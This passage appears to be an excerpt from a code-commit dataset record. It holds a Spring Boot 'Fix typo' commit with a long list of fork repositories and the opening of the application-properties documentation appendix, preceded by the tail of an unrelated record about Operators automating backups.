Having an Operator manage an application\u2019s backup at\nset times can save a system administrator from remembering to do it.\n\nAny application maintenance that has traditionally been completed manually,\nlike backing up data or rotating certificates, can be completed automatically\nwith an Operator.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a4e5ee0b32197e17b4e7c2d3643f1fc9dea67e42","subject":"Fix typo","message":"Fix typo\n","repos":"mbenson\/spring-boot,htynkn\/spring-boot,deki\/spring-boot,AngusZhu\/spring-boot,ojacquemart\/spring-boot,brettwooldridge\/spring-boot,jrrickard\/spring-boot,DONIKAN\/spring-boot,dnsw83\/spring-boot,5zzang\/spring-boot,lingounet\/spring-boot,frost2014\/spring-boot,philwebb\/spring-boot,fireshort\/spring-boot,liupugong\/spring-boot,mouadtk\/spring-boot,clarklj001\/spring-boot,ApiSecRay\/spring-boot,MasterRoots\/spring-boot,jeremiahmarks\/spring-boot,jayarampradhan\/spring-boot,akmaharshi\/jenkins,satheeshmb\/spring-boot,izeye\/spring-boot,murilobr\/spring-boot,npcode\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,ameraljovic\/spring-boot,htynkn\/spring-boot,mdeinum\/spring-boot,pvorb\/spring-boot,johnktims\/spring-boot,mabernardo\/spring-boot,paddymahoney\/spring-boot,axibase\/spring-boot,bijukunjummen\/spring-boot,vaseemahmed01\/spring-boot,sungha\/spring-boot,zhanhb\/spring-boot,ptahchiev\/spring-boot,pnambiarsf\/spring-boot,okba1\/spring-boot,meftaul\/spring-boot,zorosteven\/spring-boot,vpavic\/spring-boot,marcellodesales\/spring-boot,zhanhb\/spring-boot,npcode\/spring-boot,prasenjit-net\/spring-boot,frost2014\/spring-boot,SPNilsen\/spring-boot,xiaoleiPENG\/my-project,Nowheresly\/spring-boot,hqrt\/jenkins2-course-spring-boot,jrrickard\/spring-boot,bijukunjummen\/spring-boot,johnktims\/spring-boot,NetoDevel\/spring-boot,RobertNickens\/spring-boot,crackien\/spring-boot,vakninr\/spring-boot,eliudiaz\/spring-boot,lokbun\/spring-boot,RainPlanter\/spring-boot,tsachev\/spring-boot,scottfrederick\/spring-boot,jayarampradhan\/spring-boot,lingounet\/spring-boot,M3lkior\/spring-boot,existmaster\/spring-boot,panbiping\/spring-boot,jxblum\/spring-boot,drunklite\/spring-boot,hello2009chen\/spring-boot,mrumpf\/spring-boot,designreuse\/spring-boot,linead\/spring-boot,srikalyan\/spring-boot,xc145214\/spring-boot,ApiSecRay\/spring-boot,patrikbeno\/spring-boot,Chomeh\/spring-boot,prakashme\/spring-boot,mabernardo\/spring-boot,sbuettner\/spring-boot,peteyan\/spring-boot,tbbost\/spring-boot,jayarampradhan\/spring-boot,Makhlab\/spring-boot,nebhale\/spring-boot,duandf35\/spring-boot,fjlopez\/spring-boot,linead\/spring-boot,spring-projects\/spring-boot,zhangshuangquan\/spring-root,fireshort\/spring-boot,drumonii\/spring-boot,scottfrederick\/spring-boot,mdeinum\/spring-boot,roymanish\/spring-boot,nelswadycki\/spring-boot,qerub\/spring-boot,axelfontaine\/spring-boot,paddymahoney\/spring-boot,patrikbeno\/spring-boot,lucassaldanha\/spring-boot,mlc0202\/spring-boot,rickeysu\/spring-boot,vpavic\/spring-boot,ChunPIG\/spring-boot,meftaul\/spring-boot,linead\/spring-boot,gauravbrills\/spring-boot,pnambiarsf\/spring-boot,i007422\/jenkins2-course-spring-boot,ameraljovic\/spring-boot,srikalyan\/spring-boot,prakashme\/spring-boot,huangyugui\/spring-boot,drumonii\/spring-boot,zhangshuangquan\/spring-root,Buzzardo\/spring-boot,michael-simons\/spring-boot,raiamber1\/spring-boot,existmaster\/spring-boot,isopov\/spring-boot,smilence1986\/spring-boot,jeremiahmarks\/spring-boot,herau\/spring-boot,axibase\/spring-boot,Pokbab\/spring-boot,linead\/spring-b
oot,RainPlanter\/spring-boot,buobao\/spring-boot,scottfrederick\/spring-boot,rickeysu\/spring-boot,jjankar\/spring-boot,kayelau\/spring-boot,philwebb\/spring-boot,MrMitchellMoore\/spring-boot,yuxiaole\/spring-boot,mouadtk\/spring-boot,xc145214\/spring-boot,existmaster\/spring-boot,orangesdk\/spring-boot,felipeg48\/spring-boot,wwadge\/spring-boot,qq83387856\/spring-boot,fjlopez\/spring-boot,jayarampradhan\/spring-boot,Charkui\/spring-boot,M3lkior\/spring-boot,frost2014\/spring-boot,eonezhang\/spring-boot,meloncocoo\/spring-boot,nevenc-pivotal\/spring-boot,chrylis\/spring-boot,keithsjohnson\/spring-boot,afroje-reshma\/spring-boot-sample,raiamber1\/spring-boot,i007422\/jenkins2-course-spring-boot,afroje-reshma\/spring-boot-sample,panbiping\/spring-boot,mosoft521\/spring-boot,huangyugui\/spring-boot,bijukunjummen\/spring-boot,nevenc-pivotal\/spring-boot,fogone\/spring-boot,ralenmandao\/spring-boot,donhuvy\/spring-boot,eddumelendez\/spring-boot,donhuvy\/spring-boot,nghialunhaiha\/spring-boot,AngusZhu\/spring-boot,5zzang\/spring-boot,mlc0202\/spring-boot,mike-kukla\/spring-boot,smayoorans\/spring-boot,SaravananParthasarathy\/SPSDemo,nisuhw\/spring-boot,Makhlab\/spring-boot,RobertNickens\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,zhanhb\/spring-boot,cleverjava\/jenkins2-course-spring-boot,shangyi0102\/spring-boot,yunbian\/spring-boot,dnsw83\/spring-boot,mouadtk\/spring-boot,paweldolecinski\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,allyjunio\/spring-boot,paweldolecinski\/spring-boot,nurkiewicz\/spring-boot,lingounet\/spring-boot,patrikbeno\/spring-boot,mbenson\/spring-boot,playleud\/spring-boot,javyzheng\/spring-boot,mebinjacob\/spring-boot,jjankar\/spring-boot,sbuettner\/spring-boot,cbtpro\/spring-boot,PraveenkumarShethe\/spring-boot,scottfrederick\/spring-boot,sebastiankirsch\/spring-boot,ojacquemart\/spring-boot,mbogoevici\/spring-boot,patrikbeno\/spring-boot,sbcoba\/spring-boot,nurkiewicz\/spring-boot,playleud\/spring-boot,xingguang2013\/spring-boot,jvz\/spring-boot,dfa1\/spring-boot,trecloux\/spring-boot,ojacquemart\/spring-boot,raiamber1\/spring-boot,shakuzen\/spring-boot,dnsw83\/spring-boot,satheeshmb\/spring-boot,huangyugui\/spring-boot,duandf35\/spring-boot,jvz\/spring-boot,christian-posta\/spring-boot,gauravbrills\/spring-boot,herau\/spring-boot,bbrouwer\/spring-boot,lokbun\/spring-boot,Makhlab\/spring-boot,jbovet\/spring-boot,jbovet\/spring-boot,paweldolecinski\/spring-boot,lexandro\/spring-boot,designreuse\/spring-boot,kdvolder\/spring-boot,i007422\/jenkins2-course-spring-boot,qq83387856\/spring-boot,MrMitchellMoore\/spring-boot,sbcoba\/spring-boot,hklv\/spring-boot,navarrogabriela\/spring-boot,tsachev\/spring-boot,cbtpro\/spring-boot,Charkui\/spring-boot,AstaTus\/spring-boot,donhuvy\/spring-boot,lenicliu\/spring-boot,mlc0202\/spring-boot,JiweiWong\/spring-boot,scottfrederick\/spring-boot,cleverjava\/jenkins2-course-spring-boot,aahlenst\/spring-boot,prasenjit-net\/spring-boot,Buzzardo\/spring-boot,ractive\/spring-boot,sebastiankirsch\/spring-boot,bjornlindstrom\/spring-boot,hqrt\/jenkins2-course-spring-boot,jmnarloch\/spring-boot,rams2588\/spring-boot,zorosteven\/spring-boot,kdvolder\/spring-boot,mouadtk\/spring-boot,shakuzen\/spring-boot,qerub\/spring-boot,pvorb\/spring-boot,drunklite\/spring-boot,xwjxwj30abc\/spring-boot,yhj630520\/spring-boot,xiaoleiPENG\/my-project,chrylis\/spring-boot,axelfontaine\/spring-boot,rickeysu\/spring-boot,5zzang\/spring-boot,fulvio-m\/spring-boot,smayoorans\/spring-boot,fireshort\/spring-boot,Chomeh\/spring-boot,paweldolecinski\/sp
ring-boot,rweisleder\/spring-boot,smayoorans\/spring-boot,ralenmandao\/spring-boot,AstaTus\/spring-boot,ilayaperumalg\/spring-boot,kamilszymanski\/spring-boot,wwadge\/spring-boot,jjankar\/spring-boot,forestqqqq\/spring-boot,christian-posta\/spring-boot,shangyi0102\/spring-boot,yhj630520\/spring-boot,marcellodesales\/spring-boot,mdeinum\/spring-boot,sbuettner\/spring-boot,JiweiWong\/spring-boot,kdvolder\/spring-boot,NetoDevel\/spring-boot,ihoneymon\/spring-boot,lenicliu\/spring-boot,joshiste\/spring-boot,ptahchiev\/spring-boot,pnambiarsf\/spring-boot,ollie314\/spring-boot,htynkn\/spring-boot,dreis2211\/spring-boot,designreuse\/spring-boot,imranansari\/spring-boot,mackeprm\/spring-boot,jxblum\/spring-boot,ptahchiev\/spring-boot,nghiavo\/spring-boot,roberthafner\/spring-boot,allyjunio\/spring-boot,felipeg48\/spring-boot,npcode\/spring-boot,tbbost\/spring-boot,tsachev\/spring-boot,ralenmandao\/spring-boot,cbtpro\/spring-boot,liupugong\/spring-boot,felipeg48\/spring-boot,mosoft521\/spring-boot,ojacquemart\/spring-boot,zhanhb\/spring-boot,Chomeh\/spring-boot,auvik\/spring-boot,RobertNickens\/spring-boot,lucassaldanha\/spring-boot,jack-luj\/spring-boot,jack-luj\/spring-boot,scottfrederick\/spring-boot,rams2588\/spring-boot,xdweleven\/spring-boot,philwebb\/spring-boot,JiweiWong\/spring-boot,RishikeshDarandale\/spring-boot,roberthafner\/spring-boot,jbovet\/spring-boot,afroje-reshma\/spring-boot-sample,linead\/spring-boot,eddumelendez\/spring-boot,akmaharshi\/jenkins,johnktims\/spring-boot,nelswadycki\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,mebinjacob\/spring-boot,durai145\/spring-boot,joshthornhill\/spring-boot,michael-simons\/spring-boot,wwadge\/spring-boot,jrrickard\/spring-boot,bclozel\/spring-boot,ameraljovic\/spring-boot,hello2009chen\/spring-boot,npcode\/spring-boot,pvorb\/spring-boot,cmsandiga\/spring-boot,forestqqqq\/spring-boot,izeye\/spring-boot,lif123\/spring-boot,5zzang\/spring-boot,Nowheresly\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,eddumelendez\/spring-boot,jvz\/spring-boot,ihoneymon\/spring-boot,jforge\/spring-boot,joshthornhill\/spring-boot,joansmith\/spring-boot,mrumpf\/spring-boot,mdeinum\/spring-boot,yunbian\/spring-boot,jvz\/spring-boot,tbadie\/spring-boot,durai145\/spring-boot,mackeprm\/spring-boot,mackeprm\/spring-boot,bbrouwer\/spring-boot,nelswadycki\/spring-boot,joshiste\/spring-boot,candrews\/spring-boot,pvorb\/spring-boot,yangdd1205\/spring-boot,tsachev\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,chrylis\/spring-boot,ptahchiev\/spring-boot,navarrogabriela\/spring-boot,tbadie\/spring-boot,DeezCashews\/spring-boot,fulvio-m\/spring-boot,RichardCSantana\/spring-boot,buobao\/spring-boot,MrMitchellMoore\/spring-boot,roymanish\/spring-boot,neo4j-contrib\/spring-boot,nurkiewicz\/spring-boot,ptahchiev\/spring-boot,mebinjacob\/spring-boot,aahlenst\/spring-boot,neo4j-contrib\/spring-boot,bclozel\/spring-boot,axibase\/spring-boot,yunbian\/spring-boot,herau\/spring-boot,navarrogabriela\/spring-boot,ihoneymon\/spring-boot,JiweiWong\/spring-boot,peteyan\/spring-boot,qq83387856\/spring-boot,aahlenst\/spring-boot,existmaster\/spring-boot,lburgazzoli\/spring-boot,zorosteven\/spring-boot,candrews\/spring-boot,lingounet\/spring-boot,rickeysu\/spring-boot,NetoDevel\/spring-boot,lingounet\/spring-boot,tsachev\/spring-boot,mebinjacob\/spring-boot,wilkinsona\/spring-boot,johnktims\/spring-boot,jxblum\/spring-boot,isopov\/spring-boot,deki\/spring-boot,yhj630520\/spring-boot,sbuettner\/spring-boot,brettwooldridge\/spring-boot,smilence1986\/spring-boot,javyzheng\/
spring-boot,nebhale\/spring-boot,drumonii\/spring-boot,jcastaldoFoodEssentials\/spring-boot,fogone\/spring-boot,nghiavo\/spring-boot,drumonii\/spring-boot,buobao\/spring-boot,vakninr\/spring-boot,zorosteven\/spring-boot,vpavic\/spring-boot,mebinjacob\/spring-boot,meloncocoo\/spring-boot,mike-kukla\/spring-boot,smayoorans\/spring-boot,minmay\/spring-boot,cmsandiga\/spring-boot,jforge\/spring-boot,RichardCSantana\/spring-boot,qerub\/spring-boot,na-na\/spring-boot,xingguang2013\/spring-boot,kiranbpatil\/spring-boot,philwebb\/spring-boot-concourse,keithsjohnson\/spring-boot,nghialunhaiha\/spring-boot,nghiavo\/spring-boot,xdweleven\/spring-boot,forestqqqq\/spring-boot,smilence1986\/spring-boot,htynkn\/spring-boot,xdweleven\/spring-boot,ollie314\/spring-boot,hello2009chen\/spring-boot,jmnarloch\/spring-boot,drumonii\/spring-boot,xingguang2013\/spring-boot,Chomeh\/spring-boot,christian-posta\/spring-boot,DeezCashews\/spring-boot,Nowheresly\/spring-boot,ractive\/spring-boot,drumonii\/spring-boot,huangyugui\/spring-boot,vaseemahmed01\/spring-boot,rams2588\/spring-boot,pnambiarsf\/spring-boot,wwadge\/spring-boot,isopov\/spring-boot,axibase\/spring-boot,satheeshmb\/spring-boot,hklv\/spring-boot,buobao\/spring-boot,orangesdk\/spring-boot,axelfontaine\/spring-boot,RainPlanter\/spring-boot,spring-projects\/spring-boot,fireshort\/spring-boot,michael-simons\/spring-boot,ameraljovic\/spring-boot,tbbost\/spring-boot,christian-posta\/spring-boot,jcastaldoFoodEssentials\/spring-boot,xwjxwj30abc\/spring-boot,ChunPIG\/spring-boot,eonezhang\/spring-boot,NetoDevel\/spring-boot,krmcbride\/spring-boot,brettwooldridge\/spring-boot,cmsandiga\/spring-boot,javyzheng\/spring-boot,roymanish\/spring-boot,mbenson\/spring-boot,aahlenst\/spring-boot,okba1\/spring-boot,kamilszymanski\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,drunklite\/spring-boot,royclarkson\/spring-boot,bbrouwer\/spring-boot,aahlenst\/spring-boot,yuxiaole\/spring-boot,peteyan\/spring-boot,lexandro\/spring-boot,donhuvy\/spring-boot,srikalyan\/spring-boot,SaravananParthasarathy\/SPSDemo,thomasdarimont\/spring-boot,huangyugui\/spring-boot,yuxiaole\/spring-boot,thomasdarimont\/spring-boot,murilobr\/spring-boot,murilobr\/spring-boot,i007422\/jenkins2-course-spring-boot,roberthafner\/spring-boot,xc145214\/spring-boot,prasenjit-net\/spring-boot,na-na\/spring-boot,cmsandiga\/spring-boot,joshiste\/spring-boot,MrMitchellMoore\/spring-boot,olivergierke\/spring-boot,NetoDevel\/spring-boot,joshiste\/spring-boot,JiweiWong\/spring-boot,cleverjava\/jenkins2-course-spring-boot,rmoorman\/spring-boot,navarrogabriela\/spring-boot,prasenjit-net\/spring-boot,wilkinsona\/spring-boot,paddymahoney\/spring-boot,playleud\/spring-boot,duandf35\/spring-boot,mosoft521\/spring-boot,durai145\/spring-boot,jmnarloch\/spring-boot,vpavic\/spring-boot,crackien\/spring-boot,ilayaperumalg\/spring-boot,raiamber1\/spring-boot,ChunPIG\/spring-boot,jmnarloch\/spring-boot,spring-projects\/spring-boot,joshiste\/spring-boot,rickeysu\/spring-boot,joansmith\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,fjlopez\/spring-boot,na-na\/spring-boot,wilkinsona\/spring-boot,srikalyan\/spring-boot,ralenmandao\/spring-boot,playleud\/spring-boot,bclozel\/spring-boot,jxblum\/spring-boot,MasterRoots\/spring-boot,dreis2211\/spring-boot,marcellodesales\/spring-boot,brettwooldridge\/spring-boot,lif123\/spring-boot,xc145214\/spring-boot,nebhale\/spring-boot,Makhlab\/spring-boot,RishikeshDarandale\/spring-boot,Pokbab\/spring-boot,bbrouwer\/spring-boot,qq83387856\/spring-boot,kdvolder\/spring-boot,m
evasaroj\/jenkins2-course-spring-boot,kayelau\/spring-boot,playleud\/spring-boot,izeye\/spring-boot,isopov\/spring-boot,ChunPIG\/spring-boot,trecloux\/spring-boot,AstaTus\/spring-boot,bclozel\/spring-boot,afroje-reshma\/spring-boot-sample,hklv\/spring-boot,philwebb\/spring-boot,sbcoba\/spring-boot,buobao\/spring-boot,fireshort\/spring-boot,bbrouwer\/spring-boot,royclarkson\/spring-boot,paddymahoney\/spring-boot,SPNilsen\/spring-boot,javyzheng\/spring-boot,nevenc-pivotal\/spring-boot,fulvio-m\/spring-boot,keithsjohnson\/spring-boot,htynkn\/spring-boot,sebastiankirsch\/spring-boot,roberthafner\/spring-boot,nisuhw\/spring-boot,vakninr\/spring-boot,nebhale\/spring-boot,cbtpro\/spring-boot,mike-kukla\/spring-boot,mackeprm\/spring-boot,Pokbab\/spring-boot,Nowheresly\/spring-boot,balajinsr\/spring-boot,axibase\/spring-boot,rmoorman\/spring-boot,PraveenkumarShethe\/spring-boot,nurkiewicz\/spring-boot,xdweleven\/spring-boot,mosoft521\/spring-boot,neo4j-contrib\/spring-boot,johnktims\/spring-boot,meloncocoo\/spring-boot,lokbun\/spring-boot,lokbun\/spring-boot,jforge\/spring-boot,michael-simons\/spring-boot,auvik\/spring-boot,mike-kukla\/spring-boot,vaseemahmed01\/spring-boot,brettwooldridge\/spring-boot,RobertNickens\/spring-boot,tiarebalbi\/spring-boot,joshthornhill\/spring-boot,roberthafner\/spring-boot,bijukunjummen\/spring-boot,allyjunio\/spring-boot,DeezCashews\/spring-boot,vpavic\/spring-boot,auvik\/spring-boot,nisuhw\/spring-boot,durai145\/spring-boot,zhangshuangquan\/spring-root,jack-luj\/spring-boot,krmcbride\/spring-boot,balajinsr\/spring-boot,izeye\/spring-boot,mabernardo\/spring-boot,hklv\/spring-boot,M3lkior\/spring-boot,lokbun\/spring-boot,DeezCashews\/spring-boot,candrews\/spring-boot,xiaoleiPENG\/my-project,kamilszymanski\/spring-boot,clarklj001\/spring-boot,hqrt\/jenkins2-course-spring-boot,isopov\/spring-boot,forestqqqq\/spring-boot,akmaharshi\/jenkins,smayoorans\/spring-boot,dfa1\/spring-boot,akmaharshi\/jenkins,SPNilsen\/spring-boot,eddumelendez\/spring-boot,Buzzardo\/spring-boot,deki\/spring-boot,jack-luj\/spring-boot,jxblum\/spring-boot,nghialunhaiha\/spring-boot,mdeinum\/spring-boot,kamilszymanski\/spring-boot,designreuse\/spring-boot,kiranbpatil\/spring-boot,roymanish\/spring-boot,afroje-reshma\/spring-boot-sample,eddumelendez\/spring-boot,yunbian\/spring-boot,jayarampradhan\/spring-boot,mbogoevici\/spring-boot,felipeg48\/spring-boot,gauravbrills\/spring-boot,joansmith\/spring-boot,ptahchiev\/spring-boot,tiarebalbi\/spring-boot,tbadie\/spring-boot,duandf35\/spring-boot,okba1\/spring-boot,eliudiaz\/spring-boot,frost2014\/spring-boot,jbovet\/spring-boot,rams2588\/spring-boot,fogone\/spring-boot,M3lkior\/spring-boot,thomasdarimont\/spring-boot,SaravananParthasarathy\/SPSDemo,olivergierke\/spring-boot,murilobr\/spring-boot,crackien\/spring-boot,dfa1\/spring-boot,tiarebalbi\/spring-boot,lburgazzoli\/spring-boot,lif123\/spring-boot,xdweleven\/spring-boot,vaseemahmed01\/spring-boot,rmoorman\/spring-boot,rweisleder\/spring-boot,kiranbpatil\/spring-boot,lucassaldanha\/spring-boot,christian-posta\/spring-boot,habuma\/spring-boot,na-na\/spring-boot,fulvio-m\/spring-boot,sbcoba\/spring-boot,AstaTus\/spring-boot,trecloux\/spring-boot,candrews\/spring-boot,mabernardo\/spring-boot,yangdd1205\/spring-boot,philwebb\/spring-boot-concourse,dfa1\/spring-boot,imranansari\/spring-boot,philwebb\/spring-boot-concourse,liupugong\/spring-boot,spring-projects\/spring-boot,okba1\/spring-boot,orangesdk\/spring-boot,shangyi0102\/spring-boot,wilkinsona\/spring-boot,zorosteven\/spring-boot,michael-simons\/sp
ring-boot,dfa1\/spring-boot,ractive\/spring-boot,auvik\/spring-boot,lif123\/spring-boot,PraveenkumarShethe\/spring-boot,prakashme\/spring-boot,RishikeshDarandale\/spring-boot,philwebb\/spring-boot-concourse,fulvio-m\/spring-boot,okba1\/spring-boot,shakuzen\/spring-boot,zhanhb\/spring-boot,Chomeh\/spring-boot,meftaul\/spring-boot,chrylis\/spring-boot,eliudiaz\/spring-boot,ihoneymon\/spring-boot,jcastaldoFoodEssentials\/spring-boot,jrrickard\/spring-boot,aahlenst\/spring-boot,drunklite\/spring-boot,jvz\/spring-boot,imranansari\/spring-boot,designreuse\/spring-boot,eliudiaz\/spring-boot,jjankar\/spring-boot,rmoorman\/spring-boot,peteyan\/spring-boot,satheeshmb\/spring-boot,patrikbeno\/spring-boot,meloncocoo\/spring-boot,lenicliu\/spring-boot,DeezCashews\/spring-boot,isopov\/spring-boot,wwadge\/spring-boot,philwebb\/spring-boot,habuma\/spring-boot,ilayaperumalg\/spring-boot,sbuettner\/spring-boot,ojacquemart\/spring-boot,bclozel\/spring-boot,RishikeshDarandale\/spring-boot,habuma\/spring-boot,smilence1986\/spring-boot,kamilszymanski\/spring-boot,rweisleder\/spring-boot,shakuzen\/spring-boot,shangyi0102\/spring-boot,jjankar\/spring-boot,drunklite\/spring-boot,mouadtk\/spring-boot,dnsw83\/spring-boot,krmcbride\/spring-boot,crackien\/spring-boot,meloncocoo\/spring-boot,Charkui\/spring-boot,meftaul\/spring-boot,hqrt\/jenkins2-course-spring-boot,xwjxwj30abc\/spring-boot,bclozel\/spring-boot,prakashme\/spring-boot,clarklj001\/spring-boot,mackeprm\/spring-boot,SaravananParthasarathy\/SPSDemo,qq83387856\/spring-boot,RainPlanter\/spring-boot,RishikeshDarandale\/spring-boot,habuma\/spring-boot,rweisleder\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,ihoneymon\/spring-boot,dnsw83\/spring-boot,joansmith\/spring-boot,lexandro\/spring-boot,Buzzardo\/spring-boot,Buzzardo\/spring-boot,MasterRoots\/spring-boot,marcellodesales\/spring-boot,mbenson\/spring-boot,mosoft521\/spring-boot,sbcoba\/spring-boot,minmay\/spring-boot,paweldolecinski\/spring-boot,royclarkson\/spring-boot,michael-simons\/spring-boot,mlc0202\/spring-boot,prasenjit-net\/spring-boot,herau\/spring-boot,SPNilsen\/spring-boot,nevenc-pivotal\/spring-boot,wilkinsona\/spring-boot,yunbian\/spring-boot,lburgazzoli\/spring-boot,tbbost\/spring-boot,raiamber1\/spring-boot,mrumpf\/spring-boot,axelfontaine\/spring-boot,kiranbpatil\/spring-boot,DONIKAN\/spring-boot,SaravananParthasarathy\/SPSDemo,olivergierke\/spring-boot,mabernardo\/spring-boot,mrumpf\/spring-boot,trecloux\/spring-boot,RichardCSantana\/spring-boot,dreis2211\/spring-boot,cleverjava\/jenkins2-course-spring-boot,joansmith\/spring-boot,ractive\/spring-boot,tsachev\/spring-boot,qerub\/spring-boot,MasterRoots\/spring-boot,eddumelendez\/spring-boot,chrylis\/spring-boot,duandf35\/spring-boot,xiaoleiPENG\/my-project,ollie314\/spring-boot,pvorb\/spring-boot,xwjxwj30abc\/spring-boot,mbogoevici\/spring-boot,chrylis\/spring-boot,felipeg48\/spring-boot,srikalyan\/spring-boot,joshthornhill\/spring-boot,paddymahoney\/spring-boot,bjornlindstrom\/spring-boot,philwebb\/spring-boot-concourse,nghiavo\/spring-boot,mike-kukla\/spring-boot,ralenmandao\/spring-boot,jbovet\/spring-boot,eliudiaz\/spring-boot,lenicliu\/spring-boot,lexandro\/spring-boot,tbadie\/spring-boot,fjlopez\/spring-boot,ollie314\/spring-boot,hello2009chen\/spring-boot,bjornlindstrom\/spring-boot,fogone\/spring-boot,neo4j-contrib\/spring-boot,na-na\/spring-boot,auvik\/spring-boot,ilayaperumalg\/spring-boot,nurkiewicz\/spring-boot,bjornlindstrom\/spring-boot,mdeinum\/spring-boot,ihoneymon\/spring-boot,akmaharshi\/jenkins,vaseemahmed01\/s
pring-boot,krmcbride\/spring-boot,Pokbab\/spring-boot,jmnarloch\/spring-boot,sungha\/spring-boot,nisuhw\/spring-boot,deki\/spring-boot,thomasdarimont\/spring-boot,nghiavo\/spring-boot,orangesdk\/spring-boot,lif123\/spring-boot,rweisleder\/spring-boot,zhangshuangquan\/spring-root,peteyan\/spring-boot,nelswadycki\/spring-boot,jeremiahmarks\/spring-boot,navarrogabriela\/spring-boot,Makhlab\/spring-boot,nisuhw\/spring-boot,olivergierke\/spring-boot,sebastiankirsch\/spring-boot,nevenc-pivotal\/spring-boot,xingguang2013\/spring-boot,RichardCSantana\/spring-boot,spring-projects\/spring-boot,minmay\/spring-boot,frost2014\/spring-boot,javyzheng\/spring-boot,imranansari\/spring-boot,royclarkson\/spring-boot,hello2009chen\/spring-boot,durai145\/spring-boot,gauravbrills\/spring-boot,yhj630520\/spring-boot,mbenson\/spring-boot,nghialunhaiha\/spring-boot,fjlopez\/spring-boot,keithsjohnson\/spring-boot,jcastaldoFoodEssentials\/spring-boot,yangdd1205\/spring-boot,tbadie\/spring-boot,axelfontaine\/spring-boot,nelswadycki\/spring-boot,mbenson\/spring-boot,sebastiankirsch\/spring-boot,roymanish\/spring-boot,qerub\/spring-boot,Charkui\/spring-boot,RichardCSantana\/spring-boot,mbogoevici\/spring-boot,panbiping\/spring-boot,RobertNickens\/spring-boot,habuma\/spring-boot,lexandro\/spring-boot,vakninr\/spring-boot,cbtpro\/spring-boot,Pokbab\/spring-boot,shangyi0102\/spring-boot,rweisleder\/spring-boot,donhuvy\/spring-boot,AngusZhu\/spring-boot,trecloux\/spring-boot,rams2588\/spring-boot,clarklj001\/spring-boot,meftaul\/spring-boot,zhanhb\/spring-boot,sungha\/spring-boot,nghialunhaiha\/spring-boot,Charkui\/spring-boot,xiaoleiPENG\/my-project,jack-luj\/spring-boot,i007422\/jenkins2-course-spring-boot,MasterRoots\/spring-boot,yuxiaole\/spring-boot,allyjunio\/spring-boot,fogone\/spring-boot,tiarebalbi\/spring-boot,felipeg48\/spring-boot,tiarebalbi\/spring-boot,cleverjava\/jenkins2-course-spring-boot,npcode\/spring-boot,kayelau\/spring-boot,herau\/spring-boot,nebhale\/spring-boot,Buzzardo\/spring-boot,jxblum\/spring-boot,clarklj001\/spring-boot,gauravbrills\/spring-boot,dreis2211\/spring-boot,mlc0202\/spring-boot,jforge\/spring-boot,neo4j-contrib\/spring-boot,donhuvy\/spring-boot,jforge\/spring-boot,balajinsr\/spring-boot,rmoorman\/spring-boot,forestqqqq\/spring-boot,balajinsr\/spring-boot,crackien\/spring-boot,spring-projects\/spring-boot,lucassaldanha\/spring-boot,pnambiarsf\/spring-boot,AngusZhu\/spring-boot,ractive\/spring-boot,Nowheresly\/spring-boot,deki\/spring-boot,cmsandiga\/spring-boot,izeye\/spring-boot,minmay\/spring-boot,liupugong\/spring-boot,tiarebalbi\/spring-boot,kayelau\/spring-boot,shakuzen\/spring-boot,orangesdk\/spring-boot,joshiste\/spring-boot,hqrt\/jenkins2-course-spring-boot,candrews\/spring-boot,htynkn\/spring-boot,ameraljovic\/spring-boot,lburgazzoli\/spring-boot,PraveenkumarShethe\/spring-boot,RainPlanter\/spring-boot,liupugong\/spring-boot,panbiping\/spring-boot,ApiSecRay\/spring-boot,tbbost\/spring-boot,jeremiahmarks\/spring-boot,jrrickard\/spring-boot,zhangshuangquan\/spring-root,DONIKAN\/spring-boot,balajinsr\/spring-boot,mbogoevici\/spring-boot,ilayaperumalg\/spring-boot,hklv\/spring-boot,allyjunio\/spring-boot,jeremiahmarks\/spring-boot,kiranbpatil\/spring-boot,eonezhang\/spring-boot,sungha\/spring-boot,imranansari\/spring-boot,bijukunjummen\/spring-boot,marcellodesales\/spring-boot,kdvolder\/spring-boot,wilkinsona\/spring-boot,dreis2211\/spring-boot,vakninr\/spring-boot,yhj630520\/spring-boot,krmcbride\/spring-boot,habuma\/spring-boot,royclarkson\/spring-boot,shakuzen\/spring-boot,pra
kashme\/spring-boot,lenicliu\/spring-boot,murilobr\/spring-boot,lucassaldanha\/spring-boot,joshthornhill\/spring-boot,existmaster\/spring-boot,xingguang2013\/spring-boot,DONIKAN\/spring-boot,xwjxwj30abc\/spring-boot,philwebb\/spring-boot,AngusZhu\/spring-boot,olivergierke\/spring-boot,eonezhang\/spring-boot,dreis2211\/spring-boot,eonezhang\/spring-boot,smilence1986\/spring-boot,ilayaperumalg\/spring-boot,satheeshmb\/spring-boot,bjornlindstrom\/spring-boot,ollie314\/spring-boot,MrMitchellMoore\/spring-boot,minmay\/spring-boot,ApiSecRay\/spring-boot,DONIKAN\/spring-boot,ApiSecRay\/spring-boot,thomasdarimont\/spring-boot,vpavic\/spring-boot,keithsjohnson\/spring-boot,jcastaldoFoodEssentials\/spring-boot,M3lkior\/spring-boot,yuxiaole\/spring-boot,5zzang\/spring-boot,xc145214\/spring-boot,PraveenkumarShethe\/spring-boot,ChunPIG\/spring-boot,kdvolder\/spring-boot,mrumpf\/spring-boot,SPNilsen\/spring-boot,panbiping\/spring-boot,kayelau\/spring-boot,AstaTus\/spring-boot,lburgazzoli\/spring-boot,sungha\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/appendix-application-properties.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/appendix-application-properties.adoc","new_contents":":numbered!:\n[appendix]\n[[common-application-properties]]\n== Common application properties\nVarious properties can be specified inside your `application.properties`\/`application.yml`\nfile or as command line switches. This section provides a list of common Spring Boot\nproperties and references to the underlying classes that consume them.\n\nNOTE: Property contributions can come from additional jar files on your classpath, so\nyou should not consider this an exhaustive list. It is also perfectly legitimate to define\nyour own properties.\n\nWARNING: This sample file is meant as a guide only. Do **not** copy\/paste the entire\ncontent into your application; rather pick only the properties that you need.\n\n
